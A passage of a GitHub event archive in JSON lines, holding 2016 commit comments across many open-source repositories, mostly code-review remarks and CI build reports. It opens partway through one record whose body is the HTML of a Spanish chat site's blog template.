= id;\r\n  js.src = \"//connect.facebook.net/es_LA/sdk.js#xfbml=1&version=v2.5&appId=1644038375825417\";\r\n  fjs.parentNode.insertBefore(js, fjs);\r\n}(document, 'script', 'facebook-jssdk'));</script>\r\n     \r\n \r\n\r\n\r\n\r\n\r\n          \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<div class='header-cap-bottom cap-bottom'>\r\n<div class='cap-left'></div>\r\n<div class='cap-right'></div>\r\n</div>\r\n</div>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n</h1>\r\n</div>\r\n<div class='descriptionwrapper'>\r\n<p class='description'><span>\r\n</span></p>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<div class='header-cap-bottom cap-bottom'>\r\n<div class='cap-left'></div>\r\n<div class='cap-right'></div>\r\n</div>\r\n</div>\r\n\r\n\r\n\r\n</header>\r\n<div class='tabs-outer'>\r\n<div class='tabs-cap-top cap-top'>\r\n<div class='cap-left'></div>\r\n<div class='cap-right'></div>\r\n</div>\r\n<div class='fauxborder-left tabs-fauxborder-left'>\r\n<div class='fauxborder-right tabs-fauxborder-right'></div>\r\n<div class='region-inner tabs-inner'>\r\n<div class='tabs section' id='crosscol'><div class='widget PageList' id='PageList1'>\r\n<h2>Pages</h2>\r\n<div class='widget-content'>\r\n<ul>\r\n<li ><a href='https://chatconamigoss.byethost15.com/sala2.html?fref=ts'>&nbspSALA1 AMISTAD&nbsp </a></li>\r\n<li ><a href='https://chatconamigoss.byethost15.com/sala3.html?fref=ts'>&nbspSALA2 AMOR&nbsp</a></li>\r\n<li ><a href='https://chatconamigoss.byethost15.com/sala4.html?fref=ts'>&nbspSALA3 LADIES&nbsp</a></li>\r\n<li ><a href='https://www.facebook.com/ChatconAmigos?fref=ts' onClick=\"window.open(this.href, this.target, 'toolbar=no, location=no, directories=no, status=no, menubar=no, scrollbars=no, resizable=yes, width=350, height=173, top=385, left=600'); return false;\">&nbsp&nbspMI PERFIL&nbsp&nbsp</a></li>\r\n<li ><a href='https://chatconamigoss.byethost15.com/salamisa.html'>&nbspMIS AMIGOS&nbsp</a></li>\r\n<li ><a href='https://m.me/ChatconAmigos' onClick=\"window.open(this.href, this.target, 'toolbar=no, location=no, directories=no, status=no, menubar=no, scrollbars=no, resizable=yes, width=350, height=173, top=385, left=600'); return false;\">&nbspMIS MENSAJES&nbsp</a></li>\r\n<li ><a href='https://chatconamigoss.byethost15.com/salats.html' >&nbsp&nbsp&nbsp&nbspTS&nbsp&nbsp&nbsp</a></li>\r\n<li ><a href='https://chatconamigoss.byethost15.com/salapp.html'>&nbsp&nbsp&nbsp&nbspPP&nbsp&nbsp&nbsp</a></li>\r\n\r\n</ul>\r\n\r\n\r\n<div class='clear'></div>\r\n<span class='widget-item-control'>\r\n<span class='item-control blog-admin'>\r\n<a class='quickedit' href='https://www.facebook.com/ChatconAmigos&widgetType=PageList&widgetId=PageList1&action=editWidget&sectionId=crosscol' onclick='return _WidgetManager._PopupConfig(document.getElementById(\"PageList1\"));' target='configPageList1' title='Edit'>\r\n<img alt='' height='18' src='https://chatconamigoss.byethost15.com/logo.png'>\r\n</a>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<div class='clear'></div>\r\n<span class='widget-item-control'>\r\n<span class='item-control blog-admin'>\r\n<a class='quickedit' href='https://www.facebook.com/ChatconAmigos&widgetType=HTML&widgetId=HTML13&action=editWidget&sectionId=crosscol-overflow' onclick='return _WidgetManager._PopupConfig(document.getElementById(\"HTML13\"));' target='configHTML13' title='Edit'>\r\n<img alt='' height='18' src='https://chatconamigoss.byethost15.com/logo.png' width='18'/>\r\n</a>\r\n\r\n</span>\r\n</span>\r\n<div class='clear'></div>\r\n</div></div>\r\n</div>\r\n</div>\r\n<div class='tabs-cap-bottom cap-bottom'>\r\n<div class='cap-left'></div>\r\n<div class='cap-right'></div>\r\n</div>\r\n</div>\r\n<div class='main-outer'>\r\n<div class='main-cap-top cap-top'>\r\n<div class='cap-left'></div>\r\n<div class='cap-right'></div>\r\n</div>\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-06T22:33:37Z"}
{"id":"4524328440","type":"CommitCommentEvent","actor":{"login":"dhensby"},"repo":{"name":"silverstripe/silverstripe-framework"},"payload":{"comment":{"id":18920038,"position":4,"line":305,"path":"control/HTTP.php","commit_id":"56f0b72e8dbf5b7205ae12c80e0f4c9a0614d1a2","created_at":"2016-09-06T22:35:10Z","updated_at":"2016-09-06T22:35:10Z","body":"fix here #5959"}},"created_at":"2016-09-06T22:35:10Z"}
{"id":"4524332423","type":"CommitCommentEvent","actor":{"login":"JamesEarle"},"repo":{"name":"MachUpskillingFY17/JabbR-Core"},"payload":{"comment":{"id":18920051,"position":null,"line":null,"path":null,"commit_id":"23fe0b2cdaa2b259b8cc734e1b3aae46e0dd8bc7","created_at":"2016-09-06T22:36:08Z","updated_at":"2016-09-06T22:36:08Z","body":"@gcrev93 they can probably be deleted. I would also add them to the `.gitignore` file as well since anybody who uses VS Code in the future will also probably have them generated."}},"created_at":"2016-09-06T22:36:08Z"}
{"id":"4524339480","type":"CommitCommentEvent","actor":{"login":"Kpatel6987"},"repo":{"name":"kpraturu/M2Repository"},"payload":{"comment":{"id":18920072,"position":null,"line":null,"path":null,"commit_id":"10c1722905e7325afbb22c9822a56dad93d9e7ba","created_at":"2016-09-06T22:37:54Z","updated_at":"2016-09-06T22:37:54Z","body":"Actually changed AntLabMain.java for P3"}},"created_at":"2016-09-06T22:37:54Z"}
{"id":"4524346114","type":"CommitCommentEvent","actor":{"login":"MysticalMage"},"repo":{"name":"MysticalMage/MinecraftPlugins"},"payload":{"comment":{"id":18920102,"position":null,"line":null,"path":null,"commit_id":"706c7b20f4b905706aae733dc97fa0a8df23c323","created_at":"2016-09-06T22:39:31Z","updated_at":"2016-09-06T22:39:31Z","body":"IT WORKED!!!!!"}},"created_at":"2016-09-06T22:39:31Z"}
{"id":"4524346906","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18920104,"position":null,"line":null,"path":null,"commit_id":"1581ee2e54d8ef6eb1f47c9958b0d8733778cd4a","created_at":"2016-09-06T22:39:42Z","updated_at":"2016-09-06T22:39:42Z","body":"@Sami32 Sorry, I don't understand this part:\r\n> IMHO nothing will broken, he just that from that old time (r376) with UPnP documentation and test..\r\nhttp://webcache.googleusercontent.com/search?q=cache:a-plsvZgRO8J:www.ps3mediaserver.org/forum/viewtopic.php%3Ff%3D2%26t%3D3217+&cd=1&hl=fr&ct=clnk&gl=fr\r\n\r\nI can't even find any reference to r376 in the link.\r\n\r\n> Why do you want it broke something ? we are just doing the same more correctly.\r\n> Anyway, we have developper with PS3 to test it :wink:\r\n\r\nI have a PS3 myself, so that's not the problem. The problem is that I don't understand why this was made, and therefore I don't understand how it's supposed to be used. That makes me unable to predict the consequences of any changes. I've also learned that there is so many ways people configure and use UMS that it's very hard to know if you break something even though the most obvious tests pass. As I see it the resample setting shouldn't be there, there should be a uniform way to handle this across renderers that also makes sense to the users. The way it is now I doubt very many users understand the consequences of the choice they make."}},"created_at":"2016-09-06T22:39:42Z"}
{"id":"4524350118","type":"CommitCommentEvent","actor":{"login":"mattdrose"},"repo":{"name":"carpages/gemini-css"},"payload":{"comment":{"id":18920115,"position":9,"line":24,"path":"objects/_pagination.scss","commit_id":"6f399518ced70e07f3d2ba674f5f75e34d1ec4af","created_at":"2016-09-06T22:40:25Z","updated_at":"2016-09-06T22:40:25Z","body":"Interesting. Thanks for digging."}},"created_at":"2016-09-06T22:40:25Z"}
{"id":"4524354335","type":"CommitCommentEvent","actor":{"login":"chrisirhc"},"repo":{"name":"lxe/safe-json-globals"},"payload":{"comment":{"id":18920122,"position":null,"line":null,"path":null,"commit_id":"b1db4071e330841e032f5c7d11254066370c6eee","created_at":"2016-09-06T22:41:21Z","updated_at":"2016-09-06T22:41:21Z","body":"@lxe looks sure if this is intentional, but the latest version on npm points to 2.0.2 rather than 1.0.2. \r\n\r\nThere wasn't an issues tab so I'm leaving this here."}},"created_at":"2016-09-06T22:41:21Z"}
{"id":"4524354390","type":"CommitCommentEvent","actor":{"login":"NiKiZe"},"repo":{"name":"bitcoinclassic/bitcoinclassic"},"payload":{"comment":{"id":18920123,"position":null,"line":null,"path":null,"commit_id":"e79a8dfeef145343741725ccbafff513beb4b99c","created_at":"2016-09-06T22:41:21Z","updated_at":"2016-09-06T22:41:21Z","body":"There is no files removed by this commit, only files changed. This simply changes so that libbitcoinconsensus.la is never built."}},"created_at":"2016-09-06T22:41:21Z"}
{"id":"4524355095","type":"CommitCommentEvent","actor":{"login":"TimboUK"},"repo":{"name":"cymplecy/scratch_gpio"},"payload":{"comment":{"id":18920126,"position":16,"line":49,"path":"scratchgpio_handler8.py","commit_id":"9b5f9465d865a319f975b4711eaab4e91e8ffbd8","created_at":"2016-09-06T22:41:30Z","updated_at":"2016-09-06T22:41:30Z","body":"Duplicated"}},"created_at":"2016-09-06T22:41:30Z"}
{"id":"4524355330","type":"CommitCommentEvent","actor":{"login":"mattdrose"},"repo":{"name":"carpages/gemini-css"},"payload":{"comment":{"id":18920128,"position":null,"line":null,"path":null,"commit_id":"f9860cbeae0b143796a121527bd3d202e1799325","created_at":"2016-09-06T22:41:34Z","updated_at":"2016-09-06T22:41:34Z","body":":P. I forgot I had a v2.0 I was working on lol"}},"created_at":"2016-09-06T22:41:34Z"}
{"id":"4524356452","type":"CommitCommentEvent","actor":{"login":"jcocchi"},"repo":{"name":"MachUpskillingFY17/JabbR-Core"},"payload":{"comment":{"id":18920132,"position":null,"line":null,"path":null,"commit_id":"23fe0b2cdaa2b259b8cc734e1b3aae46e0dd8bc7","created_at":"2016-09-06T22:41:49Z","updated_at":"2016-09-06T22:41:49Z","body":"@gcrev93 Should we also change the class names of these for more clarity? "}},"created_at":"2016-09-06T22:41:49Z"}
{"id":"4524357958","type":"CommitCommentEvent","actor":{"login":"trentxintong"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":18920136,"position":null,"line":null,"path":null,"commit_id":"98943cbbf59221a5857abb1705ee490dac67bcb2","created_at":"2016-09-06T22:42:09Z","updated_at":"2016-09-06T22:42:09Z","body":"This is rdar://27941015"}},"created_at":"2016-09-06T22:42:09Z"}
{"id":"4524359284","type":"CommitCommentEvent","actor":{"login":"justinmk"},"repo":{"name":"rbong/galvanize.vim"},"payload":{"comment":{"id":18920138,"position":27,"line":387,"path":"plugin/galvanize.vim","commit_id":"872d66a55f19879f95c2d38f8904c1bac3c9f611","created_at":"2016-09-06T22:42:27Z","updated_at":"2016-09-06T22:42:27Z","body":"only `c@` needs to be mapped, then `getchar()` can be used to get the next character (the register name)."}},"created_at":"2016-09-06T22:42:27Z"}
{"id":"4524359742","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18920140,"position":null,"line":null,"path":null,"commit_id":"51c455dfba7bcbc70740fe5af88295896005561b","created_at":"2016-09-06T22:42:33Z","updated_at":"2016-09-06T22:42:33Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1759 of 1760 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51c455dfba7bcbc70740fe5af88295896005561b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51c455dfba7bcbc70740fe5af88295896005561b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51c455dfba7bcbc70740fe5af88295896005561b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-06T22:42:33Z"}
{"id":"4524360923","type":"CommitCommentEvent","actor":{"login":"trevordmiller"},"repo":{"name":"trevordmiller/nova-vim"},"payload":{"comment":{"id":18920144,"position":null,"line":null,"path":null,"commit_id":"0ad8ef947325000fbfa6a8885539538a308cab68","created_at":"2016-09-06T22:42:51Z","updated_at":"2016-09-06T22:42:51Z","body":"### Before\r\n\r\n![screen shot 2016-09-06 at 4 29 53 pm](https://cloud.githubusercontent.com/assets/5497885/18293467/245c724c-7450-11e6-9185-986a96315c95.png)\r\n\r\n### After\r\n\r\n![screen shot 2016-09-06 at 4 33 34 pm](https://cloud.githubusercontent.com/assets/5497885/18293466/245c2396-7450-11e6-9e91-4e3d3323b678.png)\r\n\r\nI feel this helps differentiate between the cursor line and splits/status line:\r\n![screen shot 2016-09-06 at 4 35 46 pm 2](https://cloud.githubusercontent.com/assets/5497885/18293469/245d39b6-7450-11e6-92d1-836f3cfa94ce.png)\r\n\r\nfyi @iammerrick, sorry I forgot to PR before. I'll get in a better habit of that. No need to update `nova-iterm` since it is already using an even brighter grayscale value `bright.black` but iterm adds opacity to that which we don't have control over. Looks like it is about as close as we can get (when turned on):\r\n\r\n![image](https://cloud.githubusercontent.com/assets/5497885/18293556/b9c6bdce-7450-11e6-81f0-b59d8d2c13a3.png)\r\n\r\nI doubt most Vim users turn on this iterm \"cursor guide\" though as it lays on top of your vim cursor line which looks really bad - no control over that."}},"created_at":"2016-09-06T22:42:51Z"}
{"id":"4524364409","type":"CommitCommentEvent","actor":{"login":"Nicofisi"},"repo":{"name":"tim740/skAliases"},"payload":{"comment":{"id":18920149,"position":null,"line":null,"path":null,"commit_id":"15a369944fe8c9892f73216456e3176ee9cca358","created_at":"2016-09-06T22:43:39Z","updated_at":"2016-09-06T22:43:39Z","body":"Is there anything like `any leaves` or `any spruce leaves` (etc)? "}},"created_at":"2016-09-06T22:43:39Z"}
{"id":"4524369088","type":"CommitCommentEvent","actor":{"login":"marta-"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18920164,"position":5,"line":66,"path":"components/family-studies/ui/src/main/resources/Families/WebHome.xml","commit_id":"c1372566973732a86957d8f40befd5b1b0a4fb6a","created_at":"2016-09-06T22:44:51Z","updated_at":"2016-09-06T22:44:51Z","body":"@veronikaslc we need to also add a translation for the proband column title"}},"created_at":"2016-09-06T22:44:51Z"}
{"id":"4524370502","type":"CommitCommentEvent","actor":{"login":"ruchern"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18920174,"position":12,"line":12,"path":"package.json","commit_id":"8be4111e94b8b1bb6a0d87ac20f6c9ae07ff0178","created_at":"2016-09-06T22:45:08Z","updated_at":"2016-09-06T22:45:08Z","body":"With this, it's now `npm run boot` instead of `npm run start`"}},"created_at":"2016-09-06T22:45:08Z"}
{"id":"4524371771","type":"CommitCommentEvent","actor":{"login":"flbulgarelli"},"repo":{"name":"mumuki/mumuki-atheneum"},"payload":{"comment":{"id":18920181,"position":5,"line":1,"path":"app/views/layouts/submissions/editor/_playground_form.html.erb","commit_id":"3bd5b485c9b841cad0053e521e11c015c681c5b7","created_at":"2016-09-06T22:45:26Z","updated_at":"2016-09-06T22:45:26Z","body":"@aguspina this is awesome! It was a really annoying bug. \r\n\r\nHowever, just a comment: \r\n\r\n```\r\nif (@exercise.queriable? || @exercise.extra_visible?) && ![:upload, :hidden].include?(editor_mode)\r\n```\r\n\r\nI think this condition can be completely removed: \r\n\r\n* exercises on playground are always queriable - otherwise the playground is ill-formed, and I think it exists a validation for that\r\n* When in a playground, the editor mode is `:playground`, so the last condition is always true, too\r\n\r\nAm I wrong? I can change this for you if you want"}},"created_at":"2016-09-06T22:45:26Z"}
{"id":"4524373371","type":"CommitCommentEvent","actor":{"login":"nigef"},"repo":{"name":"pyta-uoft/pyta"},"payload":{"comment":{"id":18920189,"position":null,"line":null,"path":null,"commit_id":"4af54241d63867e82eb866b66fc35bf474eee581","created_at":"2016-09-06T22:45:50Z","updated_at":"2016-09-06T22:45:50Z","body":"It looks like the commit history was lost on some files, e.g. `pyta/python_ta/transforms/setendings.py`, is that okay?"}},"created_at":"2016-09-06T22:45:50Z"}
{"id":"4524374636","type":"CommitCommentEvent","actor":{"login":"esoergel"},"repo":{"name":"dimagi/commcare-hq"},"payload":{"comment":{"id":18920192,"position":null,"line":null,"path":null,"commit_id":"a851ba12a760164c59908fd8c2d7ded23bf52c9e","created_at":"2016-09-06T22:46:10Z","updated_at":"2016-09-06T22:46:10Z","body":"@dannyroberts You may be interested in this commit"}},"created_at":"2016-09-06T22:46:10Z"}
{"id":"4524375332","type":"CommitCommentEvent","actor":{"login":"mikejolley"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":18920196,"position":null,"line":null,"path":null,"commit_id":"e2d206421d8b47adc622e4e56d72e939da48ca71","created_at":"2016-09-06T22:46:20Z","updated_at":"2016-09-06T22:46:20Z","body":"@tamarazuk Normalise strips all special characters so they are stored correctly, then later on they are formatted back with `-` if needed. e.g. brazil postcodes always have `-` so we insert it back in the correct place.\r\n\r\nIf this is an issue about US postcodes, we don't officially support 9 digits. "}},"created_at":"2016-09-06T22:46:20Z"}
{"id":"4524377338","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18920201,"position":null,"line":null,"path":null,"commit_id":"9bd9ec3f586c379d214a670a5fa5e8c2f912ae54","created_at":"2016-09-06T22:46:50Z","updated_at":"2016-09-06T22:46:50Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9bd9ec3f586c379d214a670a5fa5e8c2f912ae54-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-06T22:46:50Z"}
{"id":"4524377575","type":"CommitCommentEvent","actor":{"login":"dongluochen"},"repo":{"name":"aaronlehmann/swarmkit"},"payload":{"comment":{"id":18920202,"position":49,"line":55,"path":"manager/scheduler/nodeset.go","commit_id":"db2c93cf12271e55abd4e38a4b526551487a4621","created_at":"2016-09-06T22:46:54Z","updated_at":"2016-09-06T22:46:54Z","body":"The inter `for` loop depends on `tree` gets updated at each level. All the `continue` would mess up this assumption. I suspect there might be errors when `continue` happens. "}},"created_at":"2016-09-06T22:46:54Z"}
{"id":"4524377964","type":"CommitCommentEvent","actor":{"login":"mattdrose"},"repo":{"name":"carpages/gemini-css"},"payload":{"comment":{"id":18920204,"position":null,"line":null,"path":null,"commit_id":"5a2ac56dbe58a656691873ef89c6f8e3692e0bdf","created_at":"2016-09-06T22:47:00Z","updated_at":"2016-09-06T22:47:00Z","body":"Ahh, I see the thinking behind it. I think border colours on websites tend to be a lot more dynamic than having a variable `get('border-color')` would lead you to believe. Just look around a website. Inputs, `<hr>`'s, Buttons, Code Blocks, Containers... they all have different border colours."}},"created_at":"2016-09-06T22:47:00Z"}
{"id":"4524379201","type":"CommitCommentEvent","actor":{"login":"cydh"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":18920208,"position":null,"line":null,"path":null,"commit_id":"d2c86491f88ac8b55eac3a1cebe16ad18c55f4aa","created_at":"2016-09-06T22:47:20Z","updated_at":"2016-09-06T22:47:20Z","body":"how many part this will be? xD"}},"created_at":"2016-09-06T22:47:20Z"}
{"id":"4524383369","type":"CommitCommentEvent","actor":{"login":"reduz"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":18920218,"position":null,"line":null,"path":null,"commit_id":"23ababdcd57079182172b1c5467fcd6bb0f303d3","created_at":"2016-09-06T22:48:25Z","updated_at":"2016-09-06T22:48:25Z","body":"Oh I thought I commited that already but seems I did not for some reason, likely I was without internet yesterday"}},"created_at":"2016-09-06T22:48:25Z"}
{"id":"4524384371","type":"CommitCommentEvent","actor":{"login":"AFADoomer"},"repo":{"name":"Realm667/WolfenDoom"},"payload":{"comment":{"id":18920223,"position":null,"line":null,"path":null,"commit_id":"4993b9437a73a1c2c4b0bf89412149e4f3ecbfdc","created_at":"2016-09-06T22:48:42Z","updated_at":"2016-09-06T22:48:42Z","body":"So, I'm not sure that I can do much of anything for this...   We're basically spamming dynamic lights, so it's no surprise that there's a performance hit...  \r\n\r\nI hit only ~20FPS in the courtyard even *without* the spotlights, though - 17-18FPS with them.\r\n\r\nI'm pushing a change that has the number of spotlight glows cut to spawning every 2 tics instead of every tic (any longer of a delay and the spotlight beam looks crappy)...  This helped  a little bit for me; let me know if this changes anything on your end."}},"created_at":"2016-09-06T22:48:42Z"}
{"id":"4524385369","type":"CommitCommentEvent","actor":{"login":"adamschwartz"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":18920224,"position":5,"line":5,"path":"app/styl/buttons.styl","commit_id":"472553dfd871695629f8e855429199a816c79b20","created_at":"2016-09-06T22:48:57Z","updated_at":"2016-09-06T22:48:57Z","body":"This is the meat of the change."}},"created_at":"2016-09-06T22:48:57Z"}
{"id":"4524385726","type":"CommitCommentEvent","actor":{"login":"mdamien"},"repo":{"name":"blakev/lys"},"payload":{"comment":{"id":18920226,"position":85,"line":92,"path":"lys/__init__.py","commit_id":"f8374b4d76dc28e00e77f869700d2bcc6a44d032","created_at":"2016-09-06T22:49:04Z","updated_at":"2016-09-06T22:49:04Z","body":"I sort the attributes mainly to make the render reproducible.\r\n\r\nSwitching to `OrderedDict` would basically solve the issue of people who wants to control the order of their attributes (do they exists ?) but the main problem resides in solving [PEP 520](https://www.python.org/dev/peps/pep-0520/) if we want people to be able to specify the ordering easily.\r\n\r\nTL;DR: I don't think we need `sort_attrs`"}},"created_at":"2016-09-06T22:49:04Z"}
{"id":"4524386320","type":"CommitCommentEvent","actor":{"login":"aguspina"},"repo":{"name":"mumuki/mumuki-atheneum"},"payload":{"comment":{"id":18920227,"position":5,"line":1,"path":"app/views/layouts/submissions/editor/_playground_form.html.erb","commit_id":"3bd5b485c9b841cad0053e521e11c015c681c5b7","created_at":"2016-09-06T22:49:11Z","updated_at":"2016-09-06T22:49:11Z","body":"U r right! I'll do it\n\nEl mar., 6 de sept. de 2016 19:45, Franco Leonardo Bulgarelli <\nnotifications@github.com> escribió:\n\n> @aguspina <https://github.com/aguspina> this is awesome! It was a really\n> annoying bug.\n>\n> However, just a comment:\n>\n> if (@exercise.queriable? || @exercise.extra_visible?) && ![:upload, :hidden].include?(editor_mode)\n>\n> I think this condition can be completely removed:\n>\n>    - exercises on playground are always queriable - otherwise the\n>    playground is ill-formed, and I think it exists a validation for that\n>    - When in a playground, the editor mode is :playground, so the last\n>    condition is always true, too\n>\n> Am I wrong? I can change this for you if you want\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mumuki/mumuki-atheneum/commit/3bd5b485c9b841cad0053e521e11c015c681c5b7#commitcomment-18920181>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AD6mDFVfjKA9m1_db1v3iK9xv93F9C3lks5qne0HgaJpZM4J2XLZ>\n> .\n>\n"}},"created_at":"2016-09-06T22:49:11Z"}
{"id":"4524386976","type":"CommitCommentEvent","actor":{"login":"marta-"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18920230,"position":5,"line":66,"path":"components/family-studies/ui/src/main/resources/Families/WebHome.xml","commit_id":"c1372566973732a86957d8f40befd5b1b0a4fb6a","created_at":"2016-09-06T22:49:22Z","updated_at":"2016-09-06T22:49:22Z","body":"Done in 389c2b7"}},"created_at":"2016-09-06T22:49:22Z"}
{"id":"4524387581","type":"CommitCommentEvent","actor":{"login":"gcrev93"},"repo":{"name":"MachUpskillingFY17/JabbR-Core"},"payload":{"comment":{"id":18920232,"position":null,"line":null,"path":null,"commit_id":"23fe0b2cdaa2b259b8cc734e1b3aae46e0dd8bc7","created_at":"2016-09-06T22:49:31Z","updated_at":"2016-09-06T22:49:31Z","body":"Holding off on changing the model names like we discussed. I'm going to do it slowly and keep testing .\n\n\n\n> On Sep 6, 2016, at 5:41 PM, Justine Cocchi <notifications@github.com> wrote:\n> \n> @gcrev93 Should we also change the class names of these for more clarity?\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-06T22:49:31Z"}
{"id":"4524391595","type":"CommitCommentEvent","actor":{"login":"gcrev93"},"repo":{"name":"MachUpskillingFY17/JabbR-Core"},"payload":{"comment":{"id":18920241,"position":null,"line":null,"path":null,"commit_id":"23fe0b2cdaa2b259b8cc734e1b3aae46e0dd8bc7","created_at":"2016-09-06T22:50:33Z","updated_at":"2016-09-06T22:50:33Z","body":"Yea that's what I thought ! I will fix it!\n\n> On Sep 6, 2016, at 5:36 PM, James Earle <notifications@github.com> wrote:\n> \n> @gcrev93 they can probably be deleted. I would also add them to the .gitignore file as well since anybody who uses VS Code in the future will also probably have them generated.\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-06T22:50:33Z"}
{"id":"4524392984","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-docs"},"payload":{"comment":{"id":18920244,"position":null,"line":null,"path":null,"commit_id":"312e91c1e1add55f7168c091f674a35c390d6403","created_at":"2016-09-06T22:50:55Z","updated_at":"2016-09-06T22:50:55Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#fIOSU9x0QuykLSu6OoWZZg"}},"created_at":"2016-09-06T22:50:55Z"}
{"id":"4524395561","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18920247,"position":null,"line":null,"path":null,"commit_id":"fa8cd66ce8e72ef923a46cff323e25fc3856c5c4","created_at":"2016-09-06T22:51:37Z","updated_at":"2016-09-06T22:51:37Z","body":"os_2_0_develop (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa8cd66ce8e72ef923a46cff323e25fc3856c5c4-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa8cd66ce8e72ef923a46cff323e25fc3856c5c4-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-06T22:51:37Z"}
{"id":"4524398553","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18920255,"position":145,"line":483,"path":"src/guess.py","commit_id":"09aa3009bda451b0d1fd8c9d0dfb4ed6e0e3699a","created_at":"2016-09-06T22:52:23Z","updated_at":"2016-09-06T22:52:23Z","body":"Missing new line and end of file."}},"created_at":"2016-09-06T22:52:23Z"}
{"id":"4524400663","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18920264,"position":4,"line":28,"path":"src/guess.py","commit_id":"09aa3009bda451b0d1fd8c9d0dfb4ed6e0e3699a","created_at":"2016-09-06T22:52:55Z","updated_at":"2016-09-06T22:52:55Z","body":"Extraneous space."}},"created_at":"2016-09-06T22:52:55Z"}
{"id":"4524402592","type":"CommitCommentEvent","actor":{"login":"mdamien"},"repo":{"name":"blakev/lys"},"payload":{"comment":{"id":18920273,"position":195,"line":185,"path":"lys/__init__.py","commit_id":"f8374b4d76dc28e00e77f869700d2bcc6a44d032","created_at":"2016-09-06T22:53:26Z","updated_at":"2016-09-06T22:53:26Z","body":"I think it would be better to let `node.children` be part of the public API of a Node since I block re-assigning children via the `/` operator. This is kind of dangerous, would need to so validation when people try to set it by hand."}},"created_at":"2016-09-06T22:53:26Z"}
{"id":"4524403300","type":"CommitCommentEvent","actor":{"login":"shnabz"},"repo":{"name":"shnabz/SickRage"},"payload":{"comment":{"id":18920274,"position":null,"line":null,"path":null,"commit_id":"b5647ea3cc012c8697c646d8cd504e9b8e369295","created_at":"2016-09-06T22:53:37Z","updated_at":"2016-09-06T22:53:37Z","body":"Forgot to remove white background on _sickrage.png,_ will upload new one."}},"created_at":"2016-09-06T22:53:37Z"}
{"id":"4524403683","type":"CommitCommentEvent","actor":{"login":"fsaad"},"repo":{"name":"probcomp/bayeslite"},"payload":{"comment":{"id":18920277,"position":36,"line":315,"path":"src/guess.py","commit_id":"09aa3009bda451b0d1fd8c9d0dfb4ed6e0e3699a","created_at":"2016-09-06T22:53:43Z","updated_at":"2016-09-06T22:53:43Z","body":"Code should be 80-char width. On sublime, go to `Preferences > Settings -- User` and add the following\r\n```\r\n\t\"rulers\":\r\n\t[\r\n\t\t80\r\n\t],\r\n```"}},"created_at":"2016-09-06T22:53:43Z"}
